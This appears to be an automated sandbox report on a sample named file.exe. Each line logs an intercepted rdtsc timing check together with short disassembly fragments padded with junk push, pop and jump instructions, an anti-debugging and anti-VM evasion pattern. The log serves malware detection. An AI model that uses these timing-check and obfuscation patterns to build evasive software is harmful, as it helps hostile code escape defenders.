Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A4D second address: E67A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A53 second address: E67A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F113721Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F1137222h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A79 second address: E44950 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60F12493A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jno 00007F60F12493A6h 0x00000011 call dword ptr [ebp+12450DCDh] 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F60F12493A8h 0x0000001f jns 00007F60F12493AAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68030 second address: E68040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68139 second address: E6813D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6813D second address: E6815B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F60F1137224h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6815B second address: E6818E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F12493A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F60F12493B7h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F60F12493A8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6818E second address: E681CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F113722Eh 0x00000008 jmp 00007F60F1137228h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137229h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68453 second address: E68458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68458 second address: E6845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6845E second address: E6848A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F60F12493B5h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jbe 00007F60F12493B4h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68691 second address: E686C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F1137216h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F60F1137224h 0x00000013 pushad 0x00000014 jmp 00007F60F113721Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68E84 second address: E68E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68E99 second address: E68EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F60F1137216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F38E second address: E9F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F394 second address: E9F398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F4D0 second address: E9F528 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F60F12493ACh 0x00000010 pushad 0x00000011 jmp 00007F60F12493B8h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F60F12493C1h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F91E second address: E9F924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B5A9 second address: E1B5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F12493A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA557A second address: EA5582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5582 second address: EA5587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5587 second address: EA55D6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F113722Eh 0x00000008 jmp 00007F60F1137226h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F60F113721Ch 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jbe 00007F60F1137263h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F60F113721Bh 0x00000023 jmp 00007F60F113721Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AB6 second address: EA5AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jns 00007F60F12493A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F60F12493AEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AD6 second address: EA5ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5ADC second address: EA5AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AE2 second address: EA5AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5AE6 second address: EA5AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5C4B second address: EA5C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F113721Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA5C5A second address: EA5C62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA63E5 second address: EA63EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA63EB second address: EA63F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA6667 second address: EA6685 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F60F1137227h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA8E9D second address: EA8EC3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F60F12493A6h 0x00000013 jmp 00007F60F12493B2h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA8FEE second address: EA9016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jno 00007F60F1137218h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F60F113721Ch 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007F60F1137216h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAC372 second address: EAC376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAC376 second address: EAC37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABC35 second address: EABC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F60F12493B2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F60F12493A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABC58 second address: EABC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABC5C second address: EABC6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ADh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EABF25 second address: EABF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F60F1137223h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03BD second address: EB03E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F60F12493ACh 0x00000012 jl 00007F60F12493A6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e jo 00007F60F12493A6h 0x00000024 pop ebx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03E5 second address: EB03EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03EE second address: EB03F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB03F3 second address: EB041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F60F1137216h 0x0000000f jmp 00007F60F1137228h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB041A second address: EB041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB06AC second address: EB06B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB0C43 second address: EB0C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493AFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4DFE second address: EB4E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4E02 second address: EB4E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1143A second address: E11440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB45F2 second address: EB4603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F12493A6h 0x0000000a jne 00007F60F12493A6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4603 second address: EB4608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4608 second address: EB461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F60F12493A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB461A second address: EB4638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F60F1137227h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4638 second address: EB463E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4760 second address: EB4786 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F60F113722Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4786 second address: EB478C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB478C second address: EB47A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB4AA2 second address: EB4AAC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB939C second address: EB93AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F60F113721Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB969E second address: EB96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B0h 0x00000009 jmp 00007F60F12493B5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB96C7 second address: EB96FA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F1137216h 0x00000008 js 00007F60F1137216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F1137223h 0x0000001a jmp 00007F60F113721Dh 0x0000001f jmp 00007F60F113721Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9854 second address: EB9860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F60F12493A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9860 second address: EB9864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9864 second address: EB9874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F60F12493ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB99BF second address: EB99CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB99CA second address: EB99CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9AE3 second address: EB9B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F1137216h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edi 0x00000012 je 00007F60F1137216h 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f js 00007F60F113721Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E688D6 second address: E688DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E688DA second address: E6891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F1137229h 0x0000000b popad 0x0000000c nop 0x0000000d add dword ptr [ebp+12465119h], esi 0x00000013 mov ebx, dword ptr [ebp+124897B8h] 0x00000019 movsx edx, bx 0x0000001c mov dword ptr [ebp+122D38A8h], ecx 0x00000022 add eax, ebx 0x00000024 mov dx, di 0x00000027 nop 0x00000028 jc 00007F60F1137224h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6891F second address: E68925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68925 second address: E68969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F60F113721Bh 0x0000000b nop 0x0000000c and edi, dword ptr [ebp+12450EDFh] 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F60F1137218h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B14h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68969 second address: E6896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6896D second address: E68973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68973 second address: E68979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9C50 second address: EB9C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F60F113721Ch 0x0000000d jbe 00007F60F1137216h 0x00000013 jo 00007F60F113721Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F60F1137224h 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0930 second address: EC093C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC093C second address: EC096D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F60F113723Fh 0x0000000e jmp 00007F60F113721Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137222h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0BEC second address: EC0BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC0E76 second address: EC0E82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19C6 second address: EC19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19CC second address: EC19D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19D0 second address: EC19DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC19DA second address: EC19EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F60F1137216h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6306 second address: EC6310 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6310 second address: EC6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6457 second address: EC645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6775 second address: EC6781 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F60F1137216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6781 second address: EC6787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6787 second address: EC67A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137229h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC67A4 second address: EC67CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F60F12493AEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6935 second address: EC6939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6939 second address: EC693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6A68 second address: EC6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
